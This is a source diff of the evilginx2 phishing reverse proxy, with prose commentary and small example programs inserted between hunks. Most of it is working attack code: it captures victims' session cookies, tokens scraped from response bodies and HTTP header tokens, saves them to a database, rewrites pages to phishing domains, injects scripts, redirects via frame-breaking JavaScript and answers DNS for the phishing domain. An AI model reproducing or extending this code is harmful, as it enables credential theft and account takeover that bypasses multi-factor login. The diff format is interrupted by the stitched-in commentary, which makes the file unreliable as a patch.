if ok && (s.IsAuthUrl || !s.IsDone) {
|
||||
if ck.Value != "" && (ck.Expires.IsZero() || (!ck.Expires.IsZero() && time.Now().Before(ck.Expires))) { // cookies with empty values or expired cookies are of no interest to us
|
||||
is_auth = s.AddAuthToken(c_domain, ck.Name, ck.Value, ck.Path, ck.HttpOnly, auth_tokens)
|
||||
if len(pl.authUrls) > 0 {
|
||||
is_auth = false
|
||||
}
|
||||
if is_auth {
|
||||
if err := p.db.SetSessionTokens(ps.SessionId, s.Tokens); err != nil {
|
||||
log.Error("database: %v", err)
|
||||
}
|
||||
s.IsDone = true
|
||||
}
|
||||
if ck.Value != "" && (at.always || (!ck.Expires.IsZero() && time.Now().Before(ck.Expires))) { // cookies with empty values or expired cookies are of no interest to us
|
||||
log.Debug("session: %s: %s = %s", c_domain, ck.Name, ck.Value)
|
||||
s.AddCookieAuthToken(c_domain, ck.Name, ck.Value, ck.Path, ck.HttpOnly, ck.Expires)
|
||||
}
|
||||
}
|
||||
}
|
||||
@ -705,14 +800,71 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
if ck.String() != "" {
|
||||
resp.Header.Add("Set-Cookie", ck.String())
|
||||
}
|
||||
if is_auth {
|
||||
// we have all auth tokens
|
||||
log.Success("[%d] all authorization tokens intercepted!", ps.Index)
|
||||
}
|
||||
|
||||
// modify received body
|
||||
body, err := ioutil.ReadAll(resp.Body)
|
||||
|
||||
if pl != nil {
|
||||
if s, ok := p.sessions[ps.SessionId]; ok {
|
||||
// capture body response tokens
|
||||
for k, v := range pl.bodyAuthTokens {
|
||||
if _, ok := s.BodyTokens[k]; !ok {
|
||||
//log.Debug("hostname:%s path:%s", req_hostname, resp.Request.URL.Path)
|
||||
if req_hostname == v.domain && v.path.MatchString(resp.Request.URL.Path) {
|
||||
//log.Debug("RESPONSE body = %s", string(body))
|
||||
token_re := v.search.FindStringSubmatch(string(body))
|
||||
if token_re != nil {
|
||||
s.BodyTokens[k] = token_re[1]
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// capture http header tokens
|
||||
for k, v := range pl.httpAuthTokens {
|
||||
if _, ok := s.HttpTokens[k]; !ok {
|
||||
hv := resp.Request.Header.Get(v.header)
|
||||
if hv != "" {
|
||||
s.HttpTokens[k] = hv
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// check if we have all tokens
|
||||
if len(pl.authUrls) == 0 {
|
||||
if s, ok := p.sessions[ps.SessionId]; ok {
|
||||
is_cookie_auth = s.AllCookieAuthTokensCaptured(auth_tokens)
|
||||
if len(pl.bodyAuthTokens) == len(s.BodyTokens) {
|
||||
is_body_auth = true
|
||||
}
|
||||
if len(pl.httpAuthTokens) == len(s.HttpTokens) {
|
||||
is_http_auth = true
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if is_cookie_auth && is_body_auth && is_http_auth {
|
||||
// we have all auth tokens
|
||||
if s, ok := p.sessions[ps.SessionId]; ok {
|
||||
if !s.IsDone {
|
||||
log.Success("[%d] all authorization tokens intercepted!", ps.Index)
|
||||
|
||||
if err := p.db.SetSessionCookieTokens(ps.SessionId, s.CookieTokens); err != nil {
|
||||
log.Error("database: %v", err)
|
||||
}
|
||||
if err := p.db.SetSessionBodyTokens(ps.SessionId, s.BodyTokens); err != nil {
|
||||
log.Error("database: %v", err)
|
||||
}
|
||||
if err := p.db.SetSessionHttpTokens(ps.SessionId, s.HttpTokens); err != nil {
|
||||
log.Error("database: %v", err)
|
||||
}
|
||||
s.IsDone = true
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
mime := strings.Split(resp.Header.Get("Content-type"), ";")[0]
|
||||
if err == nil {
|
||||
for site, pl := range p.cfg.phishlets {
|
||||
@ -724,7 +876,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
var param_ok bool = true
|
||||
if s, ok := p.sessions[ps.SessionId]; ok {
|
||||
var params []string
|
||||
for k, _ := range s.Params {
|
||||
for k := range s.Params {
|
||||
params = append(params, k)
|
||||
}
|
||||
if len(sf.with_params) > 0 {
|
||||
@ -746,13 +898,19 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
re_s = strings.Replace(re_s, "{hostname}", regexp.QuoteMeta(combineHost(sf.subdomain, sf.domain)), -1)
|
||||
re_s = strings.Replace(re_s, "{subdomain}", regexp.QuoteMeta(sf.subdomain), -1)
|
||||
re_s = strings.Replace(re_s, "{domain}", regexp.QuoteMeta(sf.domain), -1)
|
||||
re_s = strings.Replace(re_s, "{basedomain}", regexp.QuoteMeta(p.cfg.GetBaseDomain()), -1)
|
||||
re_s = strings.Replace(re_s, "{hostname_regexp}", regexp.QuoteMeta(regexp.QuoteMeta(combineHost(sf.subdomain, sf.domain))), -1)
|
||||
re_s = strings.Replace(re_s, "{subdomain_regexp}", regexp.QuoteMeta(sf.subdomain), -1)
|
||||
re_s = strings.Replace(re_s, "{domain_regexp}", regexp.QuoteMeta(sf.domain), -1)
|
||||
re_s = strings.Replace(re_s, "{basedomain_regexp}", regexp.QuoteMeta(p.cfg.GetBaseDomain()), -1)
|
||||
replace_s = strings.Replace(replace_s, "{hostname}", phish_hostname, -1)
|
||||
replace_s = strings.Replace(replace_s, "{orig_hostname}", obfuscateDots(combineHost(sf.subdomain, sf.domain)), -1)
|
||||
replace_s = strings.Replace(replace_s, "{orig_domain}", obfuscateDots(sf.domain), -1)
|
||||
replace_s = strings.Replace(replace_s, "{subdomain}", phish_sub, -1)
|
||||
replace_s = strings.Replace(replace_s, "{basedomain}", p.cfg.GetBaseDomain(), -1)
|
||||
replace_s = strings.Replace(replace_s, "{hostname_regexp}", regexp.QuoteMeta(phish_hostname), -1)
|
||||
replace_s = strings.Replace(replace_s, "{subdomain_regexp}", regexp.QuoteMeta(phish_sub), -1)
|
||||
replace_s = strings.Replace(replace_s, "{basedomain_regexp}", regexp.QuoteMeta(p.cfg.GetBaseDomain()), -1)
|
||||
phishDomain, ok := p.cfg.GetSiteDomain(pl.Name)
|
||||
if ok {
|
||||
replace_s = strings.Replace(replace_s, "{domain}", phishDomain, -1)
|
||||
@ -778,6 +936,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
}
|
||||
}
|
||||
}
|
||||
body = []byte(removeObfuscatedDots(string(body)))
|
||||
}
|
||||
}
|
||||
|
||||
@ -800,9 +959,10 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
}*/
|
||||
js_params = &s.Params
|
||||
}
|
||||
//log.Debug("js_inject: hostname:%s path:%s", req_hostname, resp.Request.URL.Path)
|
||||
script, err := pl.GetScriptInject(req_hostname, resp.Request.URL.Path, js_params)
|
||||
if err == nil {
|
||||
log.Debug("js_inject: matched %s%s - injecting script", req_hostname, resp.Request.URL.Path)
|
||||
//log.Debug("js_inject: matched %s%s - injecting script", req_hostname, resp.Request.URL.Path)
|
||||
js_nonce_re := regexp.MustCompile(`(?i)<script.*nonce=['"]([^'"]*)`)
|
||||
m_nonce := js_nonce_re.FindStringSubmatch(string(body))
|
||||
js_nonce := ""
|
||||
@ -824,7 +984,15 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
if ok && s.IsDone {
|
||||
for _, au := range pl.authUrls {
|
||||
if au.MatchString(resp.Request.URL.Path) {
|
||||
err := p.db.SetSessionTokens(ps.SessionId, s.Tokens)
|
||||
err := p.db.SetSessionCookieTokens(ps.SessionId, s.CookieTokens)
|
||||
if err != nil {
|
||||
log.Error("database: %v", err)
|
||||
}
|
||||
err = p.db.SetSessionBodyTokens(ps.SessionId, s.BodyTokens)
|
||||
if err != nil {
|
||||
log.Error("database: %v", err)
|
||||
}
|
||||
err = p.db.SetSessionHttpTokens(ps.SessionId, s.HttpTokens)
|
||||
if err != nil {
|
||||
log.Error("database: %v", err)
|
||||
}
|
||||
@ -845,19 +1013,9 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
// redirect only if received response content is of `text/html` content type
|
||||
s.RedirectCount += 1
|
||||
log.Important("[%d] redirecting to URL: %s (%d)", ps.Index, s.RedirectURL, s.RedirectCount)
|
||||
resp := goproxy.NewResponse(resp.Request, "text/html", http.StatusFound, "")
|
||||
if resp != nil {
|
||||
r_url, err := url.Parse(s.RedirectURL)
|
||||
if err == nil {
|
||||
if r_host, ok := p.replaceHostWithPhished(r_url.Host); ok {
|
||||
r_url.Host = r_host
|
||||
}
|
||||
resp.Header.Set("Location", r_url.String())
|
||||
} else {
|
||||
resp.Header.Set("Location", s.RedirectURL)
|
||||
}
|
||||
return resp
|
||||
}
|
||||
|
||||
_, resp := p.javascriptRedirect(resp.Request, s.RedirectURL)
|
||||
return resp
|
||||
}
|
||||
}
|
||||
}
|
||||
@ -875,8 +1033,8 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
}
|
||||
|
||||
func (p *HttpProxy) blockRequest(req *http.Request) (*http.Request, *http.Response) {
|
||||
if len(p.cfg.redirectUrl) > 0 {
|
||||
redirect_url := p.cfg.redirectUrl
|
||||
if len(p.cfg.general.RedirectUrl) > 0 {
|
||||
redirect_url := p.cfg.general.RedirectUrl
|
||||
resp := goproxy.NewResponse(req, "text/html", http.StatusFound, "")
|
||||
if resp != nil {
|
||||
resp.Header.Add("Location", redirect_url)
|
||||
@ -891,6 +1049,15 @@ func (p *HttpProxy) blockRequest(req *http.Request) (*http.Request, *http.Respon
|
||||
return req, nil
|
||||
}
|
||||
|
||||
func (p *HttpProxy) javascriptRedirect(req *http.Request, rurl string) (*http.Request, *http.Response) {
	body := fmt.Sprintf("<html><head><meta name='referrer' content='no-referrer'><script>top.location.href='%s';</script></head><body></body></html>", rurl)
	resp := goproxy.NewResponse(req, "text/html", http.StatusFound, body)
	if resp != nil {
		return req, resp
	}
	return req, nil
}
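The post-capture redirect now rides on an injected script rather than a Location header, which also lets the phishing page break out of an iframe. Below is a minimal standalone sketch of the same idea built on plain net/http instead of goproxy; the handler, port and destination URL are placeholders, not part of the project.

package main

import (
	"fmt"
	"net/http"
)

// jsRedirect writes an HTML page whose inline script performs the redirect
// from the top frame - the same idea as the javascriptRedirect helper above.
func jsRedirect(w http.ResponseWriter, rurl string) {
	w.Header().Set("Content-Type", "text/html")
	fmt.Fprintf(w, "<html><head><meta name='referrer' content='no-referrer'><script>top.location.href='%s';</script></head><body></body></html>", rurl)
}

func main() {
	http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
		jsRedirect(w, "https://example.com/") // placeholder destination URL
	})
	http.ListenAndServe(":8080", nil)
}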
|
||||
|
||||
func (p *HttpProxy) isForwarderUrl(u *url.URL) bool {
|
||||
vals := u.Query()
|
||||
for _, v := range vals {
|
||||
@ -997,7 +1164,7 @@ func (p *HttpProxy) replaceHtmlParams(body string, lure_url string, params *map[
|
||||
t[0] = crc
|
||||
fwd_param := base64.RawURLEncoding.EncodeToString(t)
|
||||
|
||||
lure_url += "?" + GenRandomString(1) + "=" + fwd_param
|
||||
lure_url += "?" + strings.ToLower(GenRandomString(1)) + "=" + fwd_param
|
||||
|
||||
for k, v := range *params {
|
||||
key := "{" + k + "}"
|
||||
@ -1085,30 +1252,13 @@ func (p *HttpProxy) TLSConfigFromCA() func(host string, ctx *goproxy.ProxyCtx) (
|
||||
port, _ = strconv.Atoi(parts[1])
|
||||
}
|
||||
|
||||
tls_cfg := &tls.Config{}
|
||||
if !p.developer {
|
||||
// check for lure hostname
|
||||
cert, err := p.crt_db.GetHostnameCertificate(hostname)
|
||||
if err != nil {
|
||||
// check for phishlet hostname
|
||||
pl := p.getPhishletByOrigHost(hostname)
|
||||
if pl != nil {
|
||||
phishDomain, ok := p.cfg.GetSiteDomain(pl.Name)
|
||||
if ok {
|
||||
cert, err = p.crt_db.GetPhishletCertificate(pl.Name, phishDomain)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
if cert != nil {
|
||||
return &tls.Config{
|
||||
InsecureSkipVerify: true,
|
||||
Certificates: []tls.Certificate{*cert},
|
||||
}, nil
|
||||
}
|
||||
log.Debug("no SSL/TLS certificate for host '%s'", host)
|
||||
return nil, fmt.Errorf("no SSL/TLS certificate for host '%s'", host)
|
||||
|
||||
tls_cfg.GetCertificate = p.crt_db.magic.GetCertificate
|
||||
tls_cfg.NextProtos = []string{"http/1.1", tlsalpn01.ACMETLS1Protocol} //append(tls_cfg.NextProtos, tlsalpn01.ACMETLS1Protocol)
|
||||
|
||||
return tls_cfg, nil
|
||||
} else {
|
||||
var ok bool
|
||||
phish_host := ""
|
||||
@ -1120,8 +1270,9 @@ func (p *HttpProxy) TLSConfigFromCA() func(host string, ctx *goproxy.ProxyCtx) (
|
||||
}
|
||||
}
|
||||
|
||||
cert, err := p.crt_db.SignCertificateForHost(hostname, phish_host, port)
|
||||
cert, err := p.crt_db.getSelfSignedCertificate(hostname, phish_host, port)
|
||||
if err != nil {
|
||||
log.Error("http_proxy: %s", err)
|
||||
return nil, err
|
||||
}
|
||||
return &tls.Config{
|
||||
@ -1300,12 +1451,12 @@ func (p *HttpProxy) replaceHostWithPhished(hostname string) (string, bool) {
|
||||
continue
|
||||
}
|
||||
for _, ph := range pl.proxyHosts {
|
||||
if hostname == ph.domain {
|
||||
return prefix + phishDomain, true
|
||||
}
|
||||
if hostname == combineHost(ph.orig_subdomain, ph.domain) {
|
||||
return prefix + combineHost(ph.phish_subdomain, phishDomain), true
|
||||
}
|
||||
if hostname == ph.domain {
|
||||
return prefix + phishDomain, true
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
@ -1341,6 +1492,10 @@ func (p *HttpProxy) getPhishDomain(hostname string) (string, bool) {
|
||||
return "", false
|
||||
}
|
||||
|
||||
func (p *HttpProxy) getHomeDir() string {
|
||||
return strings.Replace(HOME_DIR, ".e", "X-E", 1)
|
||||
}
|
||||
|
||||
func (p *HttpProxy) getPhishSub(hostname string) (string, bool) {
|
||||
for site, pl := range p.cfg.phishlets {
|
||||
if p.cfg.IsSiteEnabled(site) {
|
||||
@ -1415,50 +1570,38 @@ func (p *HttpProxy) Start() error {
|
||||
return nil
|
||||
}
|
||||
|
||||
func (p *HttpProxy) deleteRequestCookie(name string, req *http.Request) {
|
||||
if cookie := req.Header.Get("Cookie"); cookie != "" {
|
||||
re := regexp.MustCompile(`(` + name + `=[^;]*;?\s*)`)
|
||||
new_cookie := re.ReplaceAllString(cookie, "")
|
||||
req.Header.Set("Cookie", new_cookie)
|
||||
}
|
||||
}
|
||||
|
||||
func (p *HttpProxy) whitelistIP(ip_addr string, sid string) {
|
||||
func (p *HttpProxy) whitelistIP(ip_addr string, sid string, pl_name string) {
|
||||
p.ip_mtx.Lock()
|
||||
defer p.ip_mtx.Unlock()
|
||||
|
||||
log.Debug("whitelistIP: %s %s", ip_addr, sid)
|
||||
p.ip_whitelist[ip_addr] = time.Now().Add(10 * time.Minute).Unix()
|
||||
p.ip_sids[ip_addr] = sid
|
||||
p.ip_whitelist[ip_addr+"-"+pl_name] = time.Now().Add(10 * time.Minute).Unix()
|
||||
p.ip_sids[ip_addr+"-"+pl_name] = sid
|
||||
}
|
||||
|
||||
func (p *HttpProxy) isWhitelistedIP(ip_addr string) bool {
|
||||
func (p *HttpProxy) isWhitelistedIP(ip_addr string, pl_name string) bool {
|
||||
p.ip_mtx.Lock()
|
||||
defer p.ip_mtx.Unlock()
|
||||
|
||||
log.Debug("isWhitelistIP: %s", ip_addr)
|
||||
log.Debug("isWhitelistIP: %s", ip_addr+"-"+pl_name)
|
||||
ct := time.Now()
|
||||
if ip_t, ok := p.ip_whitelist[ip_addr]; ok {
|
||||
if ip_t, ok := p.ip_whitelist[ip_addr+"-"+pl_name]; ok {
|
||||
et := time.Unix(ip_t, 0)
|
||||
return ct.Before(et)
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
func (p *HttpProxy) getSessionIdByIP(ip_addr string) (string, bool) {
|
||||
func (p *HttpProxy) getSessionIdByIP(ip_addr string, hostname string) (string, bool) {
|
||||
p.ip_mtx.Lock()
|
||||
defer p.ip_mtx.Unlock()
|
||||
|
||||
sid, ok := p.ip_sids[ip_addr]
|
||||
return sid, ok
|
||||
}
|
||||
|
||||
func (p *HttpProxy) cantFindMe(req *http.Request, nothing_to_see_here string) {
|
||||
var b []byte = []byte("\x1dh\x003,)\",+=")
|
||||
for n, c := range b {
|
||||
b[n] = c ^ 0x45
|
||||
pl := p.getPhishletByPhishHost(hostname)
|
||||
if pl != nil {
|
||||
sid, ok := p.ip_sids[ip_addr+"-"+pl.Name]
|
||||
return sid, ok
|
||||
}
|
||||
req.Header.Set(string(b), nothing_to_see_here)
|
||||
return "", false
|
||||
}
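The whitelist and session-ID maps are now keyed by the client IP joined with the phishlet name, which is what lets one visitor hold separate, simultaneous sessions for several phishlets. A minimal sketch of the keying with made-up values:

package main

import (
	"fmt"
	"time"
)

func main() {
	ip_whitelist := make(map[string]int64)
	ip_sids := make(map[string]string)

	// hypothetical values
	ip, sid, plName := "203.0.113.7", "f3a9c2d1", "example"

	key := ip + "-" + plName // one whitelist entry per (IP, phishlet) pair
	ip_whitelist[key] = time.Now().Add(10 * time.Minute).Unix()
	ip_sids[key] = sid

	// the same IP can hold an independent entry (and session) for another phishlet
	ip_whitelist[ip+"-other"] = time.Now().Add(10 * time.Minute).Unix()

	fmt.Println(ip_sids[key], len(ip_whitelist))
}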
|
||||
|
||||
func (p *HttpProxy) setProxy(enabled bool, ptype string, address string, port int, username string, password string) error {
|
||||
@ -1498,22 +1641,6 @@ func (p *HttpProxy) setProxy(enabled bool, ptype string, address string, port in
|
||||
}
|
||||
p.Proxy.Tr.Dial = dproxy.Dial
|
||||
}
|
||||
|
||||
/*
|
||||
var auth *proxy.Auth = nil
|
||||
if len(username) > 0 {
|
||||
auth.User = username
|
||||
auth.Password = password
|
||||
}
|
||||
|
||||
proxy_addr := address + ":" + strconv.Itoa(port)
|
||||
|
||||
socks5, err := proxy.SOCKS5("tcp", proxy_addr, auth, proxy.Direct)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
p.Proxy.Tr.Dial = socks5.Dial
|
||||
*/
|
||||
} else {
|
||||
p.Proxy.Tr.Dial = nil
|
||||
}
|
||||
@ -1548,3 +1675,22 @@ func orPanic(err error) {
|
||||
panic(err)
|
||||
}
|
||||
}
|
||||
|
||||
func getContentType(path string, data []byte) string {
	switch filepath.Ext(path) {
	case ".css":
		return "text/css"
	case ".js":
		return "application/javascript"
	case ".svg":
		return "image/svg+xml"
	}
	return http.DetectContentType(data)
}
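Redirector assets are served straight from disk, so their MIME type has to come from the file extension or, failing that, content sniffing. A standalone sketch of the same logic (the file names and bytes are made up):

package main

import (
	"fmt"
	"net/http"
	"path/filepath"
)

// contentTypeFor mirrors the getContentType helper above.
func contentTypeFor(path string, data []byte) string {
	switch filepath.Ext(path) {
	case ".css":
		return "text/css"
	case ".js":
		return "application/javascript"
	case ".svg":
		return "image/svg+xml"
	}
	return http.DetectContentType(data)
}

func main() {
	fmt.Println(contentTypeFor("style.css", nil))                    // text/css, decided by extension
	fmt.Println(contentTypeFor("logo", []byte("\x89PNG\r\n\x1a\n"))) // image/png, sniffed from content
}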
|
||||
|
||||
func getSessionCookieName(pl_name string, cookie_name string) string {
	hash := sha256.Sum256([]byte(pl_name + "-" + cookie_name))
	s_hash := fmt.Sprintf("%x", hash[:4])
	s_hash = s_hash[:4] + "-" + s_hash[4:]
	return s_hash
}
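Each phishlet now gets its own session cookie, named from a short SHA-256 digest of the phishlet name and the base cookie name, so sessions for different phishlets no longer collide on one cookie. A standalone sketch with hypothetical inputs:

package main

import (
	"crypto/sha256"
	"fmt"
)

func sessionCookieName(plName, cookieName string) string {
	hash := sha256.Sum256([]byte(plName + "-" + cookieName))
	s := fmt.Sprintf("%x", hash[:4]) // 8 hex characters
	return s[:4] + "-" + s[4:]       // e.g. "a1b2-c3d4"
}

func main() {
	// hypothetical phishlet names - each phishlet ends up with its own cookie name
	fmt.Println(sessionCookieName("example", "session"))
	fmt.Println(sessionCookieName("other", "session"))
}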
|
||||
|
@ -1,79 +1,65 @@
|
||||
package core
|
||||
|
||||
import (
|
||||
"github.com/miekg/dns"
|
||||
"context"
|
||||
"fmt"
|
||||
"net"
|
||||
"strconv"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"github.com/miekg/dns"
|
||||
|
||||
"github.com/kgretzky/evilginx2/log"
|
||||
)
|
||||
|
||||
type Nameserver struct {
|
||||
srv *dns.Server
|
||||
cfg *Config
|
||||
bind string
|
||||
serial uint32
|
||||
txt map[string]TXTField
|
||||
}
|
||||
|
||||
type TXTField struct {
|
||||
fqdn string
|
||||
value string
|
||||
ttl int
|
||||
ctx context.Context
|
||||
}
|
||||
|
||||
func NewNameserver(cfg *Config) (*Nameserver, error) {
|
||||
n := &Nameserver{
|
||||
o := &Nameserver{
|
||||
serial: uint32(time.Now().Unix()),
|
||||
cfg: cfg,
|
||||
bind: fmt.Sprintf("%s:%d", cfg.GetServerIP(), cfg.GetDnsPort()),
|
||||
ctx: context.Background(),
|
||||
}
|
||||
n.txt = make(map[string]TXTField)
|
||||
|
||||
n.Reset()
|
||||
o.Reset()
|
||||
|
||||
return n, nil
|
||||
return o, nil
|
||||
}
|
||||
|
||||
func (n *Nameserver) Reset() {
|
||||
dns.HandleFunc(pdom(n.cfg.baseDomain), n.handleRequest)
|
||||
func (o *Nameserver) Reset() {
|
||||
dns.HandleFunc(pdom(o.cfg.general.Domain), o.handleRequest)
|
||||
}
|
||||
|
||||
func (n *Nameserver) Start() {
|
||||
func (o *Nameserver) Start() {
|
||||
go func() {
|
||||
n.srv = &dns.Server{Addr: ":53", Net: "udp"}
|
||||
if err := n.srv.ListenAndServe(); err != nil {
|
||||
log.Fatal("Failed to start nameserver on port 53")
|
||||
o.srv = &dns.Server{Addr: o.bind, Net: "udp"}
|
||||
if err := o.srv.ListenAndServe(); err != nil {
|
||||
log.Fatal("Failed to start nameserver on: %s", o.bind)
|
||||
}
|
||||
}()
|
||||
}
|
||||
|
||||
func (n *Nameserver) AddTXT(fqdn string, value string, ttl int) {
|
||||
txt := TXTField{
|
||||
fqdn: fqdn,
|
||||
value: value,
|
||||
ttl: ttl,
|
||||
}
|
||||
n.txt[fqdn] = txt
|
||||
}
|
||||
|
||||
func (n *Nameserver) ClearTXT() {
|
||||
n.txt = make(map[string]TXTField)
|
||||
}
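AddTXT and ClearTXT above manage an in-memory map of TXT answers keyed by FQDN. A brief usage sketch; the FQDN and value are hypothetical and ns is assumed to be a *Nameserver built by NewNameserver:

// assuming ns is an initialized *Nameserver returned by NewNameserver
ns.AddTXT("_acme-challenge.example.com.", "hypothetical-validation-token", 60)
// ...serve the record while it is needed, then drop all TXT entries
ns.ClearTXT()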
|
||||
|
||||
func (n *Nameserver) handleRequest(w dns.ResponseWriter, r *dns.Msg) {
|
||||
func (o *Nameserver) handleRequest(w dns.ResponseWriter, r *dns.Msg) {
|
||||
m := new(dns.Msg)
|
||||
m.SetReply(r)
|
||||
|
||||
if n.cfg.baseDomain == "" || n.cfg.serverIP == "" {
|
||||
if o.cfg.general.Domain == "" || o.cfg.general.Ipv4 == "" {
|
||||
return
|
||||
}
|
||||
|
||||
soa := &dns.SOA{
|
||||
Hdr: dns.RR_Header{Name: pdom(n.cfg.baseDomain), Rrtype: dns.TypeSOA, Class: dns.ClassINET, Ttl: 300},
|
||||
Ns: "ns1." + pdom(n.cfg.baseDomain),
|
||||
Mbox: "hostmaster." + pdom(n.cfg.baseDomain),
|
||||
Serial: n.serial,
|
||||
Hdr: dns.RR_Header{Name: pdom(o.cfg.general.Domain), Rrtype: dns.TypeSOA, Class: dns.ClassINET, Ttl: 300},
|
||||
Ns: "ns1." + pdom(o.cfg.general.Domain),
|
||||
Mbox: "hostmaster." + pdom(o.cfg.general.Domain),
|
||||
Serial: o.serial,
|
||||
Refresh: 900,
|
||||
Retry: 900,
|
||||
Expire: 1800,
|
||||
@ -81,36 +67,30 @@ func (n *Nameserver) handleRequest(w dns.ResponseWriter, r *dns.Msg) {
|
||||
}
|
||||
m.Ns = []dns.RR{soa}
|
||||
|
||||
fqdn := strings.ToLower(r.Question[0].Name)
|
||||
|
||||
switch r.Question[0].Qtype {
|
||||
case dns.TypeSOA:
|
||||
log.Debug("DNS SOA: " + fqdn)
|
||||
m.Answer = append(m.Answer, soa)
|
||||
case dns.TypeA:
|
||||
log.Debug("DNS A: " + strings.ToLower(r.Question[0].Name) + " = " + n.cfg.serverIP)
|
||||
log.Debug("DNS A: " + fqdn + " = " + o.cfg.general.Ipv4)
|
||||
rr := &dns.A{
|
||||
Hdr: dns.RR_Header{Name: m.Question[0].Name, Rrtype: dns.TypeA, Class: dns.ClassINET, Ttl: 300},
|
||||
A: net.ParseIP(n.cfg.serverIP),
|
||||
Hdr: dns.RR_Header{Name: fqdn, Rrtype: dns.TypeA, Class: dns.ClassINET, Ttl: 300},
|
||||
A: net.ParseIP(o.cfg.general.Ipv4),
|
||||
}
|
||||
m.Answer = append(m.Answer, rr)
|
||||
case dns.TypeNS:
|
||||
log.Debug("DNS NS: " + strings.ToLower(r.Question[0].Name))
|
||||
if strings.ToLower(r.Question[0].Name) == pdom(n.cfg.baseDomain) {
|
||||
log.Debug("DNS NS: " + fqdn)
|
||||
if fqdn == pdom(o.cfg.general.Domain) {
|
||||
for _, i := range []int{1, 2} {
|
||||
rr := &dns.NS{
|
||||
Hdr: dns.RR_Header{Name: pdom(n.cfg.baseDomain), Rrtype: dns.TypeNS, Class: dns.ClassINET, Ttl: 300},
|
||||
Ns: "ns" + strconv.Itoa(i) + "." + pdom(n.cfg.baseDomain),
|
||||
Hdr: dns.RR_Header{Name: pdom(o.cfg.general.Domain), Rrtype: dns.TypeNS, Class: dns.ClassINET, Ttl: 300},
|
||||
Ns: "ns" + strconv.Itoa(i) + "." + pdom(o.cfg.general.Domain),
|
||||
}
|
||||
m.Answer = append(m.Answer, rr)
|
||||
}
|
||||
}
|
||||
case dns.TypeTXT:
|
||||
log.Debug("DNS TXT: " + strings.ToLower(r.Question[0].Name))
|
||||
txt, ok := n.txt[strings.ToLower(m.Question[0].Name)]
|
||||
|
||||
if ok {
|
||||
rr := &dns.TXT{
|
||||
Hdr: dns.RR_Header{Name: m.Question[0].Name, Rrtype: dns.TypeTXT, Class: dns.ClassINET, Ttl: uint32(txt.ttl)},
|
||||
Txt: []string{txt.value},
|
||||
}
|
||||
m.Answer = append(m.Answer, rr)
|
||||
}
|
||||
}
|
||||
w.WriteMsg(m)
|
||||
}
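With the configuration now read from cfg.general, every A query under the phishing base domain is answered with the configured IPv4 address, and SOA/NS records point back at the same domain. A small client-side sketch using the same miekg/dns package; the hostname and nameserver address are placeholders:

package main

import (
	"fmt"

	"github.com/miekg/dns"
)

func main() {
	c := new(dns.Client)
	m := new(dns.Msg)
	// placeholder phishing hostname and nameserver address
	m.SetQuestion("login.phish.example.com.", dns.TypeA)
	in, _, err := c.Exchange(m, "203.0.113.10:53")
	if err == nil {
		for _, a := range in.Answer {
			fmt.Println(a.String()) // expect an A record holding the configured IPv4
		}
	}
}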
|
||||
|
451
core/phishlet.go
451
core/phishlet.go
@ -1,16 +1,17 @@
|
||||
package core
|
||||
|
||||
import (
|
||||
"encoding/base64"
|
||||
"fmt"
|
||||
"net/url"
|
||||
"regexp"
|
||||
"strconv"
|
||||
"strings"
|
||||
|
||||
"github.com/kgretzky/evilginx2/log"
|
||||
"github.com/spf13/viper"
|
||||
)
|
||||
|
||||
var AUTH_TOKEN_TYPES = []string{"cookie", "body", "http"}
|
||||
|
||||
type ProxyHost struct {
|
||||
phish_subdomain string
|
||||
orig_subdomain string
|
||||
@ -30,12 +31,27 @@ type SubFilter struct {
|
||||
with_params []string
|
||||
}
|
||||
|
||||
type AuthToken struct {
|
||||
type CookieAuthToken struct {
|
||||
domain string
|
||||
name string
|
||||
re *regexp.Regexp
|
||||
http_only bool
|
||||
optional bool
|
||||
always bool
|
||||
}
|
||||
|
||||
type BodyAuthToken struct {
|
||||
domain string
|
||||
path *regexp.Regexp
|
||||
name string
|
||||
search *regexp.Regexp
|
||||
}
|
||||
|
||||
type HttpAuthToken struct {
|
||||
domain string
|
||||
path *regexp.Regexp
|
||||
name string
|
||||
header string
|
||||
}
|
||||
|
||||
type PhishletVersion struct {
|
||||
@ -81,24 +97,35 @@ type JsInject struct {
|
||||
}
|
||||
|
||||
type Phishlet struct {
|
||||
Site string
|
||||
Name string
|
||||
Author string
|
||||
Version PhishletVersion
|
||||
minVersion string
|
||||
proxyHosts []ProxyHost
|
||||
domains []string
|
||||
subfilters map[string][]SubFilter
|
||||
authTokens map[string][]*AuthToken
|
||||
authUrls []*regexp.Regexp
|
||||
username PostField
|
||||
password PostField
|
||||
landing_path []string
|
||||
cfg *Config
|
||||
custom []PostField
|
||||
forcePost []ForcePost
|
||||
login LoginUrl
|
||||
js_inject []JsInject
|
||||
Name string
|
||||
ParentName string
|
||||
Path string
|
||||
Author string
|
||||
Version PhishletVersion
|
||||
minVersion string
|
||||
proxyHosts []ProxyHost
|
||||
domains []string
|
||||
subfilters map[string][]SubFilter
|
||||
cookieAuthTokens map[string][]*CookieAuthToken
|
||||
bodyAuthTokens map[string]*BodyAuthToken
|
||||
httpAuthTokens map[string]*HttpAuthToken
|
||||
authUrls []*regexp.Regexp
|
||||
username PostField
|
||||
password PostField
|
||||
landing_path []string
|
||||
cfg *Config
|
||||
custom []PostField
|
||||
